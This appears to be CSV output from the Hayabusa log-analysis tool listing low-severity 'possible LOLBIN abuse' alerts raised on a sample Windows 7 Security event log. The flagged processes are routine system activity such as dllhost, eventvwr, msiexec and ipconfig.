2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
